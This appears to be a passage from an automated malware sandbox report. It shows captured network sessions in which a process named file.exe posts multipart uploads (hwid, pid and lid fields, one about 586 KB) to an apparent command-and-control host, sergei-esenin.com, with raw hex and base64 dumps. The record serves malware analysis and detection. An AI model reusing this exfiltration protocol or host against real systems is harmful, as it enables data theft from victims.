                                                                                                                                                                                Data Ascii: Mv/Dfi0AVY2WnSPGFTdnGsHqwQhEHyjUIrpUMwxzK5U455EuZihVj5qYOIkvenJb26rBDg5IYtgqtFE4AzBt3i3/w3ArDkKZmJokyAcwYxPB480LSxcmkGH3VStMayX0MvTdfDELEIDTjW7MGXo1VcbrwgNKHizUI7FcPgM1b9U49dl+JwZbkJ2RI88TNmwQgqSGBVZQepABsFEhTgZm2zH4xzY5RUnfmphuk1U0aBrQ69QHQAIu1Sm6UT0MNmL
                                                                                                                                                                                2024-10-20 06:39:04 UTC1369INData Raw: 7a 59 35 52 55 6e 66 6d 70 68 75 6b 31 55 32 5a 42 58 4a 34 4d 49 43 53 52 30 6e 30 79 69 30 58 7a 51 47 50 57 4c 52 4d 2f 62 63 63 43 59 4d 56 4a 71 50 6b 53 66 48 47 58 6f 6a 56 63 58 79 68 6c 6f 4f 50 79 58 47 4c 4a 68 52 49 67 56 7a 65 70 73 6d 76 39 5a 36 5a 6c 4d 51 6d 4a 69 63 4a 63 30 64 4f 6e 38 51 7a 4f 48 48 43 45 67 52 4c 39 77 70 74 31 4d 7a 43 6a 39 6c 30 6a 6a 74 77 33 4d 67 47 56 72 66 30 39 51 70 30 31 56 69 4c 53 50 53 2f 64 63 55 44 43 55 68 33 69 47 77 52 48 4d 54 66 58 79 56 4f 50 4f 52 4c 6d 59 41 55 4a 4f 61 6e 43 6a 50 48 54 56 69 48 4e 44 72 79 67 78 63 46 79 4c 5a 49 62 68 65 4f 67 45 30 61 4e 34 31 38 74 56 78 4a 30 73 65 33 35 71 4d 62 70 4e 56 44 48 30 59 7a 73 54 4e 44 6b 64 51 50 5a 34 32 39 31 55 2f 54 47 73 6c 30 54 50 33
                                                                                                                                                                                Data Ascii: zY5RUnfmphuk1U2ZBXJ4MICSR0n0yi0XzQGPWLRM/bccCYMVJqPkSfHGXojVcXyhloOPyXGLJhRIgVzepsmv9Z6ZlMQmJicJc0dOn8QzOHHCEgRL9wpt1MzCj9l0jjtw3MgGVrf09Qp01ViLSPS/dcUDCUh3iGwRHMTfXyVOPORLmYAUJOanCjPHTViHNDrygxcFyLZIbheOgE0aN418tVxJ0se35qMbpNVDH0YzsTNDkdQPZ4291U/TGsl0TP3
                                                                                                                                                                                2024-10-20 06:39:04 UTC199INData Raw: 35 56 6d 35 71 51 4b 4d 52 56 64 43 30 53 32 71 71 65 51 6d 45 33 46 35 49 4f 6a 52 49 73 51 69 6f 6c 30 6a 4f 2f 69 54 59 71 43 46 79 58 6b 70 49 6e 78 78 38 7a 5a 68 6e 4a 37 73 6f 4c 53 78 59 6a 31 53 71 32 56 6a 38 47 4e 57 62 57 4d 50 44 65 66 6d 5a 46 45 4a 69 46 31 48 61 4c 4d 43 31 6d 47 38 53 71 32 55 78 58 55 43 58 63 62 2b 38 53 50 77 55 31 59 39 41 7a 2f 74 64 2b 49 77 4e 55 6e 70 75 53 4c 63 51 52 50 32 77 61 78 75 62 49 43 45 38 52 4c 74 73 67 76 46 64 7a 51 6e 4e 69 7a 58 2b 6e 6b 55 63 6c 48 55 65 50 6b 64 51 78 68 51 78 36 61 68 6d 43 73 6f 59 44 58 42 6f 6f 33 69 71 0d 0a
                                                                                                                                                                                Data Ascii: 5Vm5qQKMRVdC0S2qqeQmE3F5IOjRIsQiol0jO/iTYqCFyXkpInxx8zZhnJ7soLSxYj1Sq2Vj8GNWbWMPDefmZFEJiF1HaLMC1mG8Sq2UxXUCXcb+8SPwU1Y9Az/td+IwNUnpuSLcQRP2waxubICE8RLtsgvFdzQnNizX+nkUclHUePkdQxhQx6ahmCsoYDXBoo3iq
                                                                                                                                                                                2024-10-20 06:39:04 UTC1369INData Raw: 33 31 61 36 0d 0a 34 56 7a 41 44 4e 47 6a 54 4d 2f 58 59 66 69 41 45 57 59 32 65 6d 43 44 4d 47 7a 5a 6a 47 4d 6a 70 79 30 49 41 55 43 58 49 62 2b 38 53 48 77 73 2b 53 39 34 7a 2b 4a 46 70 61 42 49 51 6d 4a 48 55 64 6f 73 5a 4d 47 45 63 77 75 50 44 43 6b 55 5a 4a 39 45 6b 73 6c 45 31 41 54 78 73 78 7a 58 38 33 33 55 71 42 31 61 65 6e 6f 59 6d 77 6c 56 30 4c 52 4c 61 71 70 35 43 62 78 34 76 78 43 69 6e 45 69 78 43 4b 69 58 53 4d 37 2b 4a 4e 69 55 4b 58 35 79 63 6d 53 6a 43 48 54 70 72 45 4d 33 6e 79 41 56 4a 45 43 2f 65 49 4c 46 61 50 67 41 34 61 39 77 35 2f 39 42 38 5a 6b 55 51 6d 49 58 55 64 6f 73 6c 4f 57 30 56 32 61 72 5a 54 46 64 51 4a 64 78 76 37 78 49 68 42 6a 70 6c 31 6a 44 34 31 58 30 71 44 6c 57 51 6e 70 30 72 77 68 73 6f 5a 42 76 4b 34 73 6b 48
                                                                                                                                                                                Data Ascii: 31a64VzADNGjTM/XYfiAEWY2emCDMGzZjGMjpy0IAUCXIb+8SHws+S94z+JFpaBIQmJHUdosZMGEcwuPDCkUZJ9EkslE1ATxsxzX833UqB1aenoYmwlV0LRLaqp5Cbx4vxCinEixCKiXSM7+JNiUKX5ycmSjCHTprEM3nyAVJEC/eILFaPgA4a9w5/9B8ZkUQmIXUdoslOW0V2arZTFdQJdxv7xIhBjpl1jD41X0qDlWQnp0rwhsoZBvK4skH
                                                                                                                                                                                2024-10-20 06:39:04 UTC1369INData Raw: 4d 67 74 46 45 79 42 69 46 33 32 54 62 33 31 48 6f 74 42 56 61 4e 6d 35 73 6e 79 42 59 7a 61 68 33 4f 34 4d 55 46 44 6c 35 69 31 7a 66 33 43 6e 4d 76 4a 48 58 59 66 2b 43 66 62 32 59 4d 58 4e 2f 46 31 43 62 47 48 54 42 70 45 73 2f 74 77 41 74 63 47 53 66 65 4c 37 4e 5a 50 41 6f 33 5a 74 55 74 2b 64 56 2b 4a 51 5a 64 6b 5a 36 51 62 6f 56 56 50 58 56 56 6d 71 72 30 44 30 41 4c 4c 64 63 2b 76 52 49 73 51 69 6f 6c 30 6a 4f 2f 69 54 59 69 42 55 4b 55 6e 4a 38 6c 78 52 49 31 61 42 2f 43 35 63 49 42 51 42 73 6a 30 79 65 36 58 7a 30 47 4f 6d 7a 53 4d 2f 76 57 4e 6d 68 4c 56 34 66 64 7a 47 37 67 4e 42 64 42 45 74 69 71 32 55 78 58 55 43 58 63 62 2b 38 53 50 77 55 2f 62 39 34 34 39 64 39 2f 4b 41 42 43 6a 5a 36 51 4c 63 49 57 50 57 51 62 77 75 33 44 44 45 6b 52 4b
                                                                                                                                                                                Data Ascii: MgtFEyBiF32Tb31HotBVaNm5snyBYzah3O4MUFDl5i1zf3CnMvJHXYf+Cfb2YMXN/F1CbGHTBpEs/twAtcGSfeL7NZPAo3ZtUt+dV+JQZdkZ6QboVVPXVVmqr0D0ALLdc+vRIsQiol0jO/iTYiBUKUnJ8lxRI1aB/C5cIBQBsj0ye6Xz0GOmzSM/vWNmhLV4fdzG7gNBdBEtiq2UxXUCXcb+8SPwU/b9449d9/KABCjZ6QLcIWPWQbwu3DDEkRK
                                                                                                                                                                                2024-10-20 06:39:04 UTC1369INData Raw: 53 48 67 41 30 54 4e 49 6b 76 38 34 34 50 30 74 58 6b 39 33 4d 62 73 6f 65 4d 47 49 59 77 65 7a 46 43 55 73 61 49 39 63 6e 75 6b 41 77 41 7a 78 68 31 54 44 35 31 33 63 70 44 56 65 57 6e 4a 77 70 69 31 74 36 61 67 32 43 73 6f 59 73 53 52 4d 6d 6b 44 44 35 53 33 4d 4c 50 79 57 4e 66 2f 2f 62 66 43 77 46 55 4a 69 50 6b 69 66 4c 46 69 68 75 45 38 72 73 79 67 35 44 47 43 76 51 4b 72 78 66 4f 41 45 31 5a 64 34 2b 76 35 38 32 49 52 4d 51 78 39 32 6c 49 38 55 52 4e 47 34 46 78 61 72 5a 54 46 64 51 4a 64 78 76 37 78 49 38 42 53 46 69 30 44 66 32 30 58 67 76 41 6c 65 62 6e 70 55 71 78 78 6f 7a 62 68 33 44 34 73 6b 42 54 68 73 71 32 69 36 35 56 33 4e 43 63 32 4c 4e 66 36 65 52 57 53 55 4f 57 35 37 66 73 79 6a 4d 47 58 70 79 57 39 75 71 77 51 34 4f 53 47 4c 54 4b 37
                                                                                                                                                                                Data Ascii: SHgA0TNIkv844P0tXk93MbsoeMGIYwezFCUsaI9cnukAwAzxh1TD513cpDVeWnJwpi1t6ag2CsoYsSRMmkDD5S3MLPyWNf//bfCwFUJiPkifLFihuE8rsyg5DGCvQKrxfOAE1Zd4+v582IRMQx92lI8URNG4FxarZTFdQJdxv7xI8BSFi0Df20XgvAlebnpUqxxozbh3D4skBThsq2i65V3NCc2LNf6eRWSUOW57fsyjMGXpyW9uqwQ4OSGLTK7
                                                                                                                                                                                2024-10-20 06:39:04 UTC1369INData Raw: 50 6d 50 43 4c 72 2b 66 4e 69 42 4c 43 4d 2f 54 31 43 72 61 56 57 49 39 52 35 6d 2f 6c 56 55 65 51 6a 32 65 4e 76 64 45 63 31 52 68 4b 35 55 74 76 34 6b 32 59 51 68 43 6a 5a 75 58 4f 4d 68 53 42 46 4d 37 78 65 7a 44 42 56 35 53 44 4e 73 37 73 42 4a 39 54 44 77 6c 6a 51 61 2f 6d 54 59 5a 52 52 43 48 33 63 78 75 2f 68 59 30 59 78 4c 55 2b 34 73 73 53 52 59 6e 31 7a 2f 31 66 44 67 59 4e 43 57 62 66 2f 6d 52 4c 6e 5a 46 45 4a 75 4d 31 48 61 62 52 32 45 34 52 70 57 36 6c 42 30 41 43 57 4c 47 62 2b 38 41 66 55 77 68 4a 59 31 2f 75 4e 4a 6b 4e 41 31 54 69 5a 37 54 45 50 55 57 4c 47 41 61 79 65 76 34 50 47 41 64 49 39 4d 68 39 57 4d 6c 41 53 4e 6d 30 44 6a 42 37 33 67 68 48 31 65 52 6d 35 52 75 68 56 55 31 4c 55 33 37 71 6f 35 43 63 56 35 69 79 47 2f 76 45 67 59
                                                                                                                                                                                Data Ascii: PmPCLr+fNiBLCM/T1CraVWI9R5m/lVUeQj2eNvdEc1RhK5Utv4k2YQhCjZuXOMhSBFM7xezDBV5SDNs7sBJ9TDwljQa/mTYZRRCH3cxu/hY0YxLU+4ssSRYn1z/1fDgYNCWbf/mRLnZFEJuM1HabR2E4RpW6lB0ACWLGb+8AfUwhJY1/uNJkNA1TiZ7TEPUWLGAayev4PGAdI9Mh9WMlASNm0DjB73ghH1eRm5RuhVU1LU37qo5CcV5iyG/vEgY
                                                                                                                                                                                2024-10-20 06:39:04 UTC1369INData Raw: 6e 48 6d 6b 57 42 6d 55 77 4c 52 33 59 5a 75 6b 31 56 39 62 67 66 51 37 4d 55 55 54 56 63 63 37 67 69 35 56 54 49 61 49 32 6a 5a 48 76 7a 41 66 42 67 31 52 5a 79 54 6d 69 6e 64 42 48 6f 6a 56 63 32 71 6e 6a 73 4f 57 47 4c 76 59 66 64 4b 63 31 52 7a 55 4e 59 78 38 64 5a 67 4e 30 5a 33 6b 5a 71 56 4f 4e 73 59 4e 6b 77 57 30 2b 43 47 54 41 34 57 59 6f 68 39 2b 52 49 33 48 58 4d 39 68 57 32 6b 68 43 56 78 57 77 4b 41 30 34 31 75 33 56 56 69 50 31 75 43 2b 49 5a 61 44 6c 63 68 77 6a 32 78 55 53 55 50 64 46 76 72 47 75 6a 53 5a 69 41 49 62 71 47 32 6d 43 6a 4d 44 7a 31 72 4d 2b 4b 71 69 45 4a 42 55 48 72 70 62 2f 38 53 44 45 4a 7a 66 5a 56 6e 76 2b 52 31 4b 41 56 58 69 59 7a 5a 43 39 77 57 4b 6d 73 57 67 71 53 47 42 41 35 49 63 70 35 76 73 30 4e 7a 56 47 4d 33
                                                                                                                                                                                Data Ascii: nHmkWBmUwLR3YZuk1V9bgfQ7MUUTVcc7gi5VTIaI2jZHvzAfBg1RZyTmindBHojVc2qnjsOWGLvYfdKc1RzUNYx8dZgN0Z3kZqVONsYNkwW0+CGTA4WYoh9+RI3HXM9hW2khCVxWwKA041u3VViP1uC+IZaDlchwj2xUSUPdFvrGujSZiAIbqG2mCjMDz1rM+KqiEJBUHrpb/8SDEJzfZVnv+R1KAVXiYzZC9wWKmsWgqSGBA5Icp5vs0NzVGM3


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                3192.168.2.449733104.21.53.84437436C:\Users\user\Desktop\file.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                2024-10-20 06:39:05 UTC372OUTPOST /api HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                Cookie: __cf_mw_byp=bKmBZVeXetEUsJEvqQWppTmgKdLdaxlDFkrWihgCGmQ-1729406342-0.0.1.1-/api
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                Content-Length: 18168
                                                                                                                                                                                Host: sergei-esenin.com
                                                                                                                                                                                2024-10-20 06:39:05 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 39 39 41 31 38 46 30 30 31 45 43 45 41 43 38 38 41 46 35 45 36 46 41 32 44 46 32 35 46 45 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                                                                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9A99A18F001ECEAC88AF5E6FA2DF25FE--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                                                                                                                2024-10-20 06:39:05 UTC2837OUTData Raw: bb b9 8c 98 dd 7e cd 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33
                                                                                                                                                                                Data Ascii: ~2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                4192.168.2.449734104.21.53.84437436C:\Users\user\Desktop\file.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                2024-10-20 06:39:07 UTC371OUTPOST /api HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                Cookie: __cf_mw_byp=bKmBZVeXetEUsJEvqQWppTmgKdLdaxlDFkrWihgCGmQ-1729406342-0.0.1.1-/api
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                Content-Length: 8789
                                                                                                                                                                                Host: sergei-esenin.com
                                                                                                                                                                                2024-10-20 06:39:07 UTC8789OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 39 39 41 31 38 46 30 30 31 45 43 45 41 43 38 38 41 46 35 45 36 46 41 32 44 46 32 35 46 45 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                                                                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9A99A18F001ECEAC88AF5E6FA2DF25FE--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                5192.168.2.449735104.21.53.84437436C:\Users\user\Desktop\file.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                2024-10-20 06:39:08 UTC372OUTPOST /api HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                Cookie: __cf_mw_byp=bKmBZVeXetEUsJEvqQWppTmgKdLdaxlDFkrWihgCGmQ-1729406342-0.0.1.1-/api
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                Content-Length: 20442
                                                                                                                                                                                Host: sergei-esenin.com
                                                                                                                                                                                2024-10-20 06:39:08 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 39 39 41 31 38 46 30 30 31 45 43 45 41 43 38 38 41 46 35 45 36 46 41 32 44 46 32 35 46 45 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                                                                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9A99A18F001ECEAC88AF5E6FA2DF25FE--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                                                                                                                2024-10-20 06:39:08 UTC5111OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60
                                                                                                                                                                                Data Ascii: `M?lrQMn 64F6(X&7~`


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                6192.168.2.449736104.21.53.84437436C:\Users\user\Desktop\file.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                2024-10-20 06:39:10 UTC371OUTPOST /api HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                Cookie: __cf_mw_byp=bKmBZVeXetEUsJEvqQWppTmgKdLdaxlDFkrWihgCGmQ-1729406342-0.0.1.1-/api
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                Host: sergei-esenin.com
                                                                                                                                                                                2024-10-20 06:39:10 UTC1245OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 39 39 41 31 38 46 30 30 31 45 43 45 41 43 38 38 41 46 35 45 36 46 41 32 44 46 32 35 46 45 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                                                                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9A99A18F001ECEAC88AF5E6FA2DF25FE--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                7192.168.2.449737104.21.53.84437436C:\Users\user\Desktop\file.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                2024-10-20 06:39:12 UTC373OUTPOST /api HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                Cookie: __cf_mw_byp=bKmBZVeXetEUsJEvqQWppTmgKdLdaxlDFkrWihgCGmQ-1729406342-0.0.1.1-/api
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                Content-Length: 586556
                                                                                                                                                                                Host: sergei-esenin.com
                                                                                                                                                                                2024-10-20 06:39:12 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 39 39 41 31 38 46 30 30 31 45 43 45 41 43 38 38 41 46 35 45 36 46 41 32 44 46 32 35 46 45 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                                                                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9A99A18F001ECEAC88AF5E6FA2DF25FE--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                                                                                                                2024-10-20 06:39:12 UTC15331OUTData Raw: 45 eb 2b 77 63 33 44 62 ad 6f 4a 14 2a 64 a1 e7 d0 be bc af a4 6c 84 53 bf 39 24 b0 7e 9a ab 32 53 be 6e 17 b7 f7 4e 50 d3 c7 64 36 a4 c3 2c 73 57 56 b6 77 d3 2d 90 40 98 45 8e 30 02 06 11 74 6b 4c 2a c3 aa 40 82 f9 4b b2 7d f9 b0 df e2 b7 70 64 e9 88 fa ba ea a7 80 8e 0a a0 31 ca eb 95 d2 84 b8 ad ba d4 d9 e4 76 21 a5 51 9f d5 6a ed 26 5b 57 de 36 aa 0c 55 3a 1d f6 62 0b 4e 19 c5 af 1f da 33 de 4a 36 78 5b 99 44 3a 7d e9 79 05 37 af 05 05 0a 0e ed 3b 49 c9 5f b6 77 a6 4b 42 77 f4 0a df 81 a5 0e 09 15 5f 2c 30 16 53 0e 69 cb f0 6f fa 5d fa 4c ee 03 27 e1 84 19 32 f1 ca 39 dd 8e 23 d1 3a 70 4d c0 cd a1 9a 9a 60 3d 9f 3f e4 ed 2a 89 8c bf 4a 3a 08 f4 eb d1 94 bb 10 39 a3 11 6e 92 04 e9 8e 3c 80 7f 83 77 a9 80 8b 65 b8 7b ee ec 46 cf 3e c4 76 c7 23 4a 30 3b
                                                                                                                                                                                Data Ascii: E+wc3DboJ*dlS9$~2SnNPd6,sWVw-@E0tkL*@K}pd1v!Qj&[W6U:bN3J6x[D:}y7;I_wKBw_,0Sio]L'29#:pM`=?*J:9n<we{F>v#J0;
